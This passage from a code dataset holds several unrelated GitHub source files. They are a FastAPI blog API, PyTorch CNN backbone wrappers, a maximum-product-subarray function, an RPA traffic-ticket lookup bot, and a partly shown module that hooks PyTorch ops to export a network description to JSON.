\r\n\t\t\t\t\t\t\tdetail=f'Blog {id} not found.')\r\n\tblog_.update(blog, synchronize_session=False)\r\n\tdb.commit()\r\n\treturn f'Blog {id} updated successfully.'\r\n\r\n# Show all Blogs\r\n\r\n@app.get('/blogs')\r\ndef all(db:Session=Depends(get_db)):\r\n\tblogs = db.query(models.Blog).all()\r\n\treturn blogs\r\n\r\n# Show a particular Blog\r\n@app.get('/blogs/{id}', status_code=200)\r\ndef show(id:int, response:Response, db:Session=Depends(get_db)):\r\n\t# blog = db.query(models.Blog)[id-1]\r\n\tblog = db.query(models.Blog).filter(models.Blog.id == id).first()\r\n\t\r\n\tif not blog:\r\n\t\t#response.status_code = status.HTTP_404_NOT_FOUND\r\n\t\t#return {'detail':f'Blog with ID {id} not found'}\r\n\t\t\r\n\t\traise HTTPException(status_code=status.HTTP_404_NOT_FOUND, \r\n\t\t\t\t\t\t\tdetail=f'Blog with ID {id} not found')\r\n\r\n\t\r\n\treturn 
blog","repo_name":"suprateembanerjee/debug","sub_path":"blog/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6445170157","text":"import torch.nn as nn\nfrom torchvision import models as models_2d\n\n\nclass Identity(nn.Module):\n \"\"\"Identity layer to replace last fully connected layer\"\"\"\n\n def forward(self, x):\n return x\n\n\n################################################################################\n# ResNet Family\n################################################################################\n\n\ndef resnet_18(pretrained=True):\n model = models_2d.resnet18(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\ndef resnet_34(pretrained=True):\n model = models_2d.resnet34(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\ndef resnet_50(pretrained=True):\n model = models_2d.resnet50(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, 1024\n\n\n################################################################################\n# DenseNet Family\n################################################################################\n\n\ndef densenet_121(pretrained=True):\n model = models_2d.densenet121(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\ndef densenet_161(pretrained=True):\n model = models_2d.densenet161(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\ndef densenet_169(pretrained=True):\n model = models_2d.densenet169(pretrained=pretrained)\n feature_dims = model.classifier.in_features\n model.classifier = Identity()\n return model, feature_dims, None\n\n\n################################################################################\n# ResNextNet Family\n################################################################################\n\n\ndef resnext_50(pretrained=True):\n model = models_2d.resnext50_32x4d(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, None\n\n\ndef resnext_100(pretrained=True):\n model = models_2d.resnext101_32x8d(pretrained=pretrained)\n feature_dims = model.fc.in_features\n model.fc = Identity()\n return model, feature_dims, None\n","repo_name":"marshuang80/gloria","sub_path":"gloria/models/cnn_backbones.py","file_name":"cnn_backbones.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"16"} +{"seq_id":"6551110425","text":"\"\"\"\r\nGiven an integer array nums, find a \r\nsubarray that has the largest product, and return the product.\r\n\"\"\"\r\n\r\ndef maxProduct(self, nums) -> int:\r\n maxi = float('-inf')\r\n pref = 1\r\n suff = 1\r\n for i in range(len(nums)):\r\n if pref == 0 : pref = 1\r\n if suff == 0 : suff = 1\r\n pref *= nums[i]\r\n suff *= nums[len(nums)-i-1]\r\n maxi = max(maxi,pref,suff)\r\n return maxi","repo_name":"AyusDas/dsa","sub_path":"imp_algo/Subarray/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} 
+{"seq_id":"11548067971","text":"\"\"\"Template robot with Python.\"\"\"\nfrom handlers import process\nfrom service import final_json\nimport json\nfrom RPA.Robocorp.WorkItems import WorkItems\n\nworkitem = WorkItems()\nworkitem.get_input_work_item()\ncomparendo_list = [\"comparendo_type\", \"comparendo_status\", \"id_comparendo\", \"dummy\", \"placa\", \"comparendo_date\", \"comparendo_saldo\", \"comparen_intereses\", \"comparendo_total\", \"comparendo_medium\"]\nurl = \"https://consultas.transitobogota.gov.co:8010/publico/index3.php\"\nplate_number = workitem.get_work_item_variable(\"placa\") #\"BRY010gy\"\ndoc_number = workitem.get_work_item_variable(\"doc_number\")#\"1060634\"\ndoc_type = workitem.get_work_item_variable(\"doc_type\")#\"CE\"\n\n# plate_number = \"BWL600\"\n# doc_number = \"819063\"\n# doc_type = \"CE\"\n\n\n\ndef trafic_ticket():\n try:\n process.open_webpage(url)\n number_of_pages = process.make_search(doc_type, plate_number, doc_number)\n total_comparendo = {}\n final_comparendo = {}\n for j in range(number_of_pages):\n for i in range(50):\n try:\n comparendo_dict = process.scrapr_from_the_initial_table(4+i, comparendo_list)\n if comparendo_dict == \"\":\n break\n else:\n total_comparendo[\"comparendo{0}\".format(i+1)] = comparendo_dict\n except Exception as e:\n raise(e)\n final_comparendo[\"data\"] = total_comparendo\n json_object = json.dumps(final_comparendo, indent=4)\n \n with open(\"./output/schema.json\", \"w\") as outfile:\n outfile.write(json_object)\n workitem.create_output_work_item(variables=final_comparendo, save=True)\n except Exception as e:\n workitem.release_input_work_item(\"FAILED\", \"BUSINESS\", message=e)\n print(\"Done.\")\n\n\nif __name__ == \"__main__\":\n trafic_ticket()\n # captcha_solution = captcha_solver.twocaptcha_solver(\"captcha.png\")\n","repo_name":"Wale17/Traffic-ticket-bot","sub_path":"task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23606993558","text":"import os\nimport json\nimport torch\nimport traceback\nfrom torch import nn\nimport numpy as np\nimport torch.nn.functional as F\nfrom .utils import Json, TransLog, LayerOut_id, REGISTERED_LIST, get_weight\nfrom . 
import config as cfg\n\n\n\n# global params\nlog = TransLog()\nINLINE = False\nPLULINE = False\nDEBUG = cfg.DEBUG\nPARAM_FLAG = True\nJSON_PARAM = {}\nMODULE_DICT = {}\n\n# Tensor operator\nraw__add__ = torch.Tensor.__add__\nraw__sub__ = torch.Tensor.__sub__\nraw__permute__ = torch.Tensor.permute\nraw__expand_as__ = torch.Tensor.expand_as\n\n\nPLUGINS_LIST = [\n \"BasicBlock\",\n \"Hsigmoid\",\n \"Hswish\",\n]\n\n\ndef get_parameters():\n global PARAM_FLAG\n global JSON_PARAM\n\n if PARAM_FLAG:\n js_init = Json(os.path.join(cfg.JSON_FILE_DIR, cfg.MODELNAME, cfg.MODELNAME + \".json\"))\n js_param = js_init.get_json_param()\n JSON_PARAM = js_param\n PARAM_FLAG = False\n return js_param\n\n js_param = JSON_PARAM\n\n return js_param\n\n\n# nn.Conv2d ---> F.conv2d\ndef _conv2d(raw, input, weight, bias=None, stride=1, padding=0, dilation=1, groups=1):\n global INLINE\n x = raw(input, weight, bias, stride, padding, dilation, groups)\n INLINE = True\n name = log.add_layer(name=\"conv2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight to get wgt\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n\n # add json params\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasFile = f\"{name}\"\n\n conv_params = dict(\n {\n \"layerStyle\": \"conv\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"biasKey\": biasKey,\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"output_c\": x.shape[1],\n \"kernel\": [weight.shape[2], weight.shape[3]],\n \"padding\": padding,\n \"stride\": stride,\n \"dilation\": dilation,\n \"groups\": groups,\n },\n }\n )\n\n if DEBUG:\n print(conv_params)\n js_param = get_parameters()\n js_param[\"network\"].append(conv_params)\n INLINE = False\n return x\n\n\n# nn.ReLU ----> F.relu\ndef _relu(raw, input, inplace=False):\n global INLINE\n name = log.add_layer(name=\"relu_\")\n inputName_ = log.blobs(input, name) # 这样防止 x == input时,它们id一致\n x = raw(input, inplace)\n INLINE = True\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n relu_params = dict(\n {\n \"layerStyle\": \"active\",\n \"layerName\": name,\n \"inputName\": inputName_,\n \"activeType\": \"relu\",\n }\n )\n if DEBUG:\n print(relu_params)\n js_param = get_parameters()\n js_param[\"network\"].append(relu_params)\n INLINE = False\n return x\n\n\n# nn.leakyReLU ---> F.leakyReLU\ndef _leaky_relu(raw, input, negative_slope=0.01, inplace=False):\n global INLINE\n x = raw(input, negative_slope, inplace)\n INLINE = True\n name = log.add_layer(name=\"leaky_relu_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n leaky_relu_params = dict(\n {\"layerStyle\": \"active\", \"layerName\": name, \"inputName\": log.blobs(input, name), \"active_type\": \"l_relu\"}\n )\n\n if DEBUG:\n print(leaky_relu_params)\n js_param = get_parameters()\n js_param[\"network\"].append(leaky_relu_params)\n INLINE = False\n return x\n\n\n# nn,MaxPool2d ---> F.max_pool2d\ndef _max_pool2d(raw, *args, **kwargs):\n global INLINE\n # args = (input, kernel, stride, padding, dilation, ceil_mode, return_indices)\n x = raw(*args, **kwargs)\n INLINE = True\n name = log.add_layer(name=\"max_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n max_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n 
\"inputName\": log.blobs(args[0], name),\n \"parameter\": {\n \"poolType\": \"kMAX\",\n # \"kernel\": [kernel_size, kernel_size] if isinstance(kernel_size, int) else kernel_size,\n # \"stride\": [stride, stride] if isinstance(stride, int) else stride,\n # \"padding\": [padding, padding] if isinstance(padding, int) else padding,\n \"kernel\": [args[1], args[1]] if isinstance(args[1], int) else args[1],\n \"stride\": [args[2], args[2]] if isinstance(args[2], int) else args[2],\n \"padding\": [args[3], args[3]] if isinstance(args[3], int) else args[3],\n },\n }\n )\n if DEBUG:\n print(max_pool2d_params)\n js_param = get_parameters()\n js_param[\"network\"].append(max_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.AvgPool2d ----> F.avg_pool2d\ndef _avg_pool2d(\n raw,\n input,\n kernel_size,\n stride=None,\n padding=0,\n ceil_mode=False,\n count_include_pad=True,\n divisor_override=None,\n):\n global INLINE\n x = raw(input, kernel_size, stride=None, padding=0, ceil_mode=False, count_include_pad=True, divisor_override=None)\n INLINE = True\n name = log.add_layer(name=\"avg_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n avg_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"poolType\": \"kAVERAGE\",\n \"kernel\": [kernel_size, kernel_size] if isinstance(kernel_size, int) else kernel_size,\n \"stride\": [stride, stride] if isinstance(stride, int) else stride,\n \"padding\": [padding, padding] if isinstance(padding, int) else padding,\n },\n }\n )\n if DEBUG:\n print(avg_pool2d_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(avg_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.Linear ---> F.linear\ndef _linear(raw, input, weight, bias=None):\n global INLINE\n x = raw(input, weight, bias)\n INLINE = True\n name = log.add_layer(name=\"linear_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasKey = f\"{name}\"\n # add json param\n linear_params = dict(\n {\n \"layerStyle\": \"fc\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"parameter\": {\"input_c\": input.shape[1], \"output_c\": x.shape[1]},\n }\n )\n if bias is not None:\n linear_params[\"biasKey\"] = biasKey\n if DEBUG:\n print(linear_params)\n js_param = get_parameters()\n js_param[\"network\"].append(linear_params)\n INLINE = False\n return x\n\n\n# nn.AdaptiveAvgPool2d ---> F.adaptive_avg_pool2d\n# tensorrt not support, just pytorch test\ndef _adaptive_avg_pool2d(raw, input, output_size):\n global INLINE\n x = raw(input, output_size)\n INLINE = True\n name = log.add_layer(name=\"adaptive_avg_pool2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n if isinstance(output_size, int):\n out_size_0 = output_size\n out_size_1 = output_size\n else:\n out_size_0 = output_size[0]\n out_size_1 = output_size[1]\n\n input_sz = np.array(input.shape[2:]) # input_size [H * W]\n output_sz = np.array([out_size_0, out_size_1])\n\n stride_sz = np.floor(input_sz / output_sz)\n kernel_sz = input_sz - (output_sz - 1) * stride_sz\n\n # no weight extract\n # add json params\n adaptive_avg_pool2d_params = dict(\n {\n \"layerStyle\": \"pool\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n 
\"parameter\": {\n \"poolType\": \"kAVG\",\n \"kernel\": [int(kernel_sz[0]), int(kernel_sz[1])],\n \"stride\": [int(stride_sz[0]), int(stride_sz[1])],\n \"padding\": [0, 0],\n },\n }\n )\n if DEBUG:\n print(adaptive_avg_pool2d_params)\n js_param = get_parameters()\n js_param[\"network\"].append(adaptive_avg_pool2d_params)\n INLINE = False\n return x\n\n\n# nn.Softmax ---> F.softmax\ndef _softmax(raw, input, dim=None, _stacklevel=3, dtype=None):\n global INLINE\n x = raw(input, dim, _stacklevel, dtype)\n INLINE = True\n name = log.add_layer(name=\"softmax_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight to extract\n # add json params\n softmax_params = dict(\n {\n \"layerStyle\": \"softmax\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n }\n )\n if DEBUG:\n print(softmax_params)\n js_param = get_parameters()\n js_param[\"network\"].append(softmax_params)\n INLINE = False\n return x\n\n\n# ConvTranspose2d ---> F.conv_transpose2d\ndef _conv_transpose2d(raw, input, weight, bias=None, stride=1, padding=0, output_padding=0, groups=1, dilation=1):\n global INLINE\n x = raw(input, weight, bias, stride, padding, output_padding, groups, dilation)\n INLINE = True\n name = log.add_layer(name=\"Deconv2d_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n weightKey = f\"{name}\"\n if bias is not None:\n get_weight(bias, f\"{name}.bias\")\n biasFile = f\"{name}.bias\"\n\n # add json params\n conv_transpose2d_params = dict(\n {\n \"layerStyle\": \"deconv\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"output_c\": x.shape[1],\n \"kernel\": [weight.shape[2], weight.shape[3]],\n \"padding\": padding,\n \"stride\": stride,\n },\n }\n )\n if bias is not None:\n conv_transpose2d_params[\"biasFile\"] = biasFile\n if DEBUG:\n print(conv_transpose2d_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(conv_transpose2d_params)\n return x\n\n\n# ['ConstantPad1d', 'ConstantPad2d', 'ConstantPad3d'] ---> F.pad\ndef _pad(raw, input, pad, mode=\"constant\", value=0):\n global INLINE\n x = raw(input, pad, mode, value)\n INLINE = True\n name = log.add_layer(name=\"pad_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # not weight extract\n # add json params\n pad_params = dict(\n {\n \"layerStyle\": \"padding\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"parameter\": {\n \"input_c\": input.shape[1],\n \"prePadding\": [0, 0],\n \"postPadding\": [1, 1],\n },\n }\n )\n if DEBUG:\n print(pad_params)\n js_param = get_parameters()\n js_param[\"network\"].append(pad_params)\n INLINE = False\n return x\n\n\n# F.interpolate\ndef _interpolate(\n raw, input, size=None, scale_factor=None, mode=\"nearest\", align_corners=None, recompute_scale_factor=None\n):\n global INLINE\n x = raw(input, size, scale_factor, mode, align_corners, recompute_scale_factor)\n INLINE = True\n name = log.add_layer(name=\"interpolate_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json param\n resizeMode = {\"nearest\": 0, \"bilinear\": 1}\n interpolate_params = dict(\n {\n \"layerStyle\": \"resize\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"resizeMode\": resizeMode[mode],\n \"alignCorners\": align_corners,\n \"resizeDim\": size,\n }\n )\n if DEBUG:\n print(interpolate_params)\n 
js_param = get_parameters()\n js_param[\"network\"].append(interpolate_params)\n INLINE = False\n return x\n\n\n# nn.BathcNorm --> F.batch_norm\ndef _batch_norm(\n raw, input, weight, bias, running_mean, running_var, training, momentum, eps, torch_backends_cudnn_enabled\n):\n global INLINE\n x = raw(input, weight, bias, running_mean, running_var, training, momentum, eps, torch_backends_cudnn_enabled)\n INLINE = True\n name = log.add_layer(name=\"BN_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight to get wgt\n get_weight(weight, f\"{name}.weight\")\n get_weight(bias, f\"{name}.bias\")\n get_weight(running_mean, f\"{name}.running_mean\")\n get_weight(running_var, f\"{name}.running_var\")\n\n # add json params\n weightKey = f\"{name}\"\n bn_params = dict(\n {\n \"layerStyle\": \"bn\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n }\n )\n if DEBUG:\n print(bn_params)\n js_param = get_parameters()\n js_param[\"network\"].append(bn_params)\n INLINE = False\n return x\n\n\n# nn.Sigmoid ---> torch.sigmoid\ndef _sigmoid(raw, input):\n global INLINE\n x = raw(input)\n INLINE = True\n name = log.add_layer(name=\"sigmoid_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weiht to extract\n # add json params\n sigmoid_params = dict(\n {\n \"layerstyle\": \"active\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"active_type\": \"sigmoid\",\n }\n )\n if DEBUG:\n print(sigmoid_params)\n js_param = get_parameters()\n js_param[\"network\"].append(sigmoid_params)\n INLINE = False\n return x\n\n\n# torch.flatten\ndef _flatten(raw, input, start_dim=1, end_dim=-1):\n global INLINE\n x = raw(input, start_dim, end_dim)\n INLINE = True\n name = LayerOut_id[int(id(input))]\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n INLINE = False\n return x\n\n\n# torch.cat\ndef _cat(raw, inputs, dim=0):\n global INLINE\n\n x = raw(inputs, dim)\n INLINE = True\n inputName = []\n for input in inputs:\n inputName.append(log.blobs(input, name=\"cat\"))\n\n name = log.add_layer(name=\"cat_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n cat_params = dict(\n {\n \"layerStyle\": \"concat\",\n \"layerName\": name,\n \"inputName\": inputName,\n \"axis\": dim,\n }\n )\n if DEBUG:\n print(cat_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(cat_params)\n INLINE = False\n return x\n\n\n# F.instance_norm\ndef _instance_norm(\n raw,\n input,\n weight,\n bias,\n running_mean,\n running_var,\n use_input_stats,\n momentum,\n eps,\n torch_backends_cudnn_enabled,\n):\n global INLINE\n x = raw(\n input, weight, bias, running_mean, running_var, use_input_stats, momentum, eps, torch_backends_cudnn_enabled\n )\n INLINE = True\n name = log.add_layer(name=\"IN_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # extract weight\n get_weight(weight, f\"{name}.weight\")\n get_weight(bias, f\"{name}. 
bias\")\n\n # add json params\n weightKey = f\"{name}\"\n biasKey = f\"{name}\"\n instance_norm_params = dict(\n {\n \"layerStyle\": \"in\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"weightKey\": weightKey,\n \"biasKey\": biasKey,\n }\n )\n\n if DEBUG:\n print(instance_norm_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(instance_norm_params)\n INLINE = False\n return x\n\n\n# torch.topk\ndef _topk(raw, input, k, dim=None, largest=True, sorted=True):\n global INLINE\n x = raw(input, k, dim, largest, sorted)\n INLINE = True\n name = log.add_layer(name=\"topk_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n topk_params = dict(\n {\n \"layerStyle\": \"topk\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"TopKOperation\": \"kMAX\" if largest else \"kMIN\",\n \"k\": k,\n \"reduceAxes\": 1,\n \"outputIndex\": 0,\n }\n )\n if DEBUG:\n print(topk_params)\n js_param = get_parameters()\n js_param[\"network\"].append(topk_params)\n INLINE = False\n return x\n\n\n# torch.argmax\ndef _argmax(raw, input, dim, keepdim=False):\n global INLINE\n x = raw(input, dim, keepdim)\n INLINE = True\n name = log.add_layer(name=\"argmax_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # no weight extract\n # add json params\n argmax_params = dict(\n {\n \"layerStyle\": \"argMax\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"outputName\": \"argMaxTestout\",\n \"parameter\": {\n \"reShape\": [1, 8, 16],\n \"chooseInde\": dim,\n },\n }\n )\n if DEBUG:\n print(argmax_params)\n js_param = get_parameters()\n js_param[\"network\"].append(argmax_params)\n INLINE = False\n return x\n\n\n# torch.div\ndef _div(raw, input, other):\n global INLINE\n x = raw(input, other)\n INLINE = True\n name = log.add_layer(name=\"div_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # add json params\n div_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kDIV\",\n \"inputName\": [log.blobs(input, name), log.blobs(other, name)],\n }\n )\n if DEBUG:\n print(div_params)\n js_param = get_parameters()\n js_param[\"network\"].append(div_params)\n INLINE = False\n return x\n\n\n# torch.split\ndef _split(raw, tensor, split_size_or_sections, dim=0):\n global INLINE\n x = raw(tensor, split_size_or_sections, dim)\n INLINE = True\n name = log.add_layer(name=\"split_\")\n layerName = []\n start = 0\n slicePoint = [\n start,\n ]\n\n for i in range(len(x)):\n layerName.append(name + \"_idx{}\".format(i + 1))\n log.add_blobs([x[i]], name=layerName[-1])\n LayerOut_id[int(id(x[i]))] = layerName[-1]\n start += len(x[i])\n slicePoint.append(start)\n\n split_params = dict(\n {\n \"layerStyle\": \"slice\",\n \"layerName\": layerName,\n \"inputName\": log.blobs(tensor, name),\n \"axis\": dim,\n \"slicePoint\": slicePoint[:-1],\n }\n )\n if DEBUG:\n print(split_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(split_params)\n INLINE = False\n return x\n\n\n# torch.reshape\ndef _reshape(raw, input, shape):\n global INLINE\n x = raw(input, shape)\n INLINE = True\n name = log.add_layer(name=\"reshape_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n # add json params\n reshape_params = dict(\n {\n \"layerStyle\": \"shuffle\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"isReshape\": True,\n \"reshapeFirst\": True,\n \"reshape\": shape,\n }\n )\n if DEBUG:\n 
print(reshape_params)\n js_param = get_parameters()\n js_param[\"network\"].append(reshape_params)\n INLINE = False\n return x\n\n\n# _add\ndef _add(input, *args):\n\n if isinstance(args[0], float) or isinstance(args[0], int):\n x = raw__add__(input, *args)\n return x\n\n global INLINE\n x = raw__add__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"add_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n add_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kSUM\",\n \"inputName\": {\n \"inputName_1\": log.blobs(input, name),\n \"inputName_2\": log.blobs(args[0], name),\n },\n }\n )\n if DEBUG:\n print(\"__add__\")\n print(add_params)\n js_param = get_parameters()\n js_param[\"network\"].append(add_params)\n INLINE = False\n return x\n\n\n# _sub\ndef _sub(input, *args):\n global INLINE\n x = raw__sub__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"sub_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n sub_params = dict(\n {\n \"layerStyle\": \"eltwise\",\n \"layerName\": name,\n \"eltType\": \"kSUB\",\n \"inputName\": [log.blobs(input, name), log.blobs(args[0], name)],\n }\n )\n\n if DEBUG:\n print(\"__sub__\")\n print(sub_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(sub_params)\n INLINE = False\n return x\n\n\n# expand_as\ndef _expand_as(input, *args):\n global INLINE\n x = raw__expand_as__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"expand_as_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n expand_as_params = dict(\n {\n \"layerStyle\": \"expand\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"expand_as\": log.blobs(args[0], name),\n }\n )\n\n if DEBUG:\n print(\"__expand_as__\")\n print(expand_as_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(expand_as_params)\n INLINE = False\n return x\n\n\ndef _Hwsife(input, *agrs):\n pass\n\n\n# _permute\ndef _permute(input, *args):\n global INLINE\n x = raw__permute__(input, *args)\n INLINE = True\n name = log.add_layer(name=\"permute_\")\n log.add_blobs([x], name=name)\n LayerOut_id[int(id(x))] = name\n\n permute_params = dict(\n {\n \"layerStype\": \"shuffle\",\n \"layerName\": name,\n \"inputName\": log.blobs(input, name),\n \"isReshape\": False,\n \"reshapeFirst\": False,\n \"reshape\": None,\n \"isPermute\": True,\n \"permute\": args,\n }\n )\n if DEBUG:\n print(\"__permute__\")\n print(permute_params)\n\n js_param = get_parameters()\n js_param[\"network\"].append(permute_params)\n INLINE = False\n return x\n\n\nclass RegOp(object):\n \"\"\"\n Registration Operator\n \"\"\"\n\n def __init__(self, raw, replace, **kwargs):\n self.obj = replace\n self.raw = raw\n\n def __call__(self, *args, **kwargs):\n global PLULINE\n if INLINE:\n return self.raw(*args, **kwargs)\n\n else:\n\n for stack in traceback.walk_stack(None):\n flag = True\n state_stack = stack[0]\n # 第一层判断\n if \"self\" in state_stack.f_locals:\n module_name = type(state_stack.f_locals[\"self\"]).__name__\n if module_name in PLUGINS_LIST:\n \n module_id = 0\n if isinstance(state_stack.f_locals, dict):\n if \"x\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"x\"])\n if \"input\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"input\"])\n\n if module_name not in MODULE_DICT.keys():\n MODULE_DICT[module_name] = module_id\n # TODO \n print(\"module_name: \", module_name)\n # print(\"module_id: \", module_id)\n break\n\n if 
module_name in MODULE_DICT.keys():\n if MODULE_DICT[module_name] == module_id:\n break\n else:\n MODULE_DICT[module_name] = module_id\n # TODO\n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n PLULINE = True\n break\n\n # Search upward through the call stack\n while flag:\n state_stack = state_stack.f_back\n if state_stack.f_code.co_name == \"_call_impl\":\n flag = False\n\n # Check one more level up\n state_stack = state_stack.f_back\n if \"self\" in state_stack.f_locals:\n module_name = type(state_stack.f_locals[\"self\"]).__name__\n if module_name in PLUGINS_LIST:\n \n module_id = 0\n if isinstance(state_stack.f_locals, dict):\n if \"x\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"x\"])\n if \"input\" in state_stack.f_locals.keys():\n module_id = id(state_stack.f_locals[\"input\"])\n\n\n if module_name not in MODULE_DICT.keys():\n MODULE_DICT[module_name] = module_id\n # TODO \n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n break\n\n if module_name in MODULE_DICT.keys():\n if MODULE_DICT[module_name] == module_id:\n break\n else:\n MODULE_DICT[module_name] = module_id\n # TODO\n print(\"module_name: \", module_name)\n print(\"module_id: \", module_id)\n PLULINE = True\n break\n break\n\n out = self.obj(self.raw, *args, **kwargs)\n return out\n\n\ndef create_network():\n\n # Create the json param\n get_parameters()\n weight_path = os.path.join(cfg.WEIGHTS_DIR, cfg.MODELNAME, cfg.MODELNAME + \".weights\")\n if os.path.exists(weight_path):\n os.remove(weight_path)\n # Write extra spaces on the first line so that seek can be used later to update the parameter count\n with open(weight_path, \"w\") as file:\n file.write(\"0 \\n\")\n return\n\n\ndef reg_functional_op():\n \"\"\"\n Registration list about all torch.nn.functional support op\n \"\"\"\n F.conv2d = RegOp(F.conv2d, _conv2d)\n F.relu = RegOp(F.relu, _relu)\n F.leaky_relu = RegOp(F.leaky_relu, _leaky_relu)\n F.max_pool2d = RegOp(F.max_pool2d, _max_pool2d)\n F.avg_pool2d = RegOp(F.avg_pool2d, _avg_pool2d)\n F.linear = RegOp(F.linear, _linear)\n F.adaptive_avg_pool2d = RegOp(F.adaptive_avg_pool2d, _adaptive_avg_pool2d)\n F.softmax = RegOp(F.softmax, _softmax)\n F.conv_transpose2d = RegOp(F.conv_transpose2d, _conv_transpose2d)\n F.pad = RegOp(F.pad, _pad)\n F.interpolate = RegOp(F.interpolate, _interpolate)\n\n\ndef reg_torch_op():\n \"\"\"\n Registration list about all torch support op\n \"\"\"\n torch.batch_norm = RegOp(torch.batch_norm, _batch_norm)\n torch.sigmoid = RegOp(torch.sigmoid, _sigmoid)\n torch.flatten = RegOp(torch.flatten, _flatten)\n torch.cat = RegOp(torch.cat, _cat)\n torch.instance_norm = RegOp(torch.instance_norm, 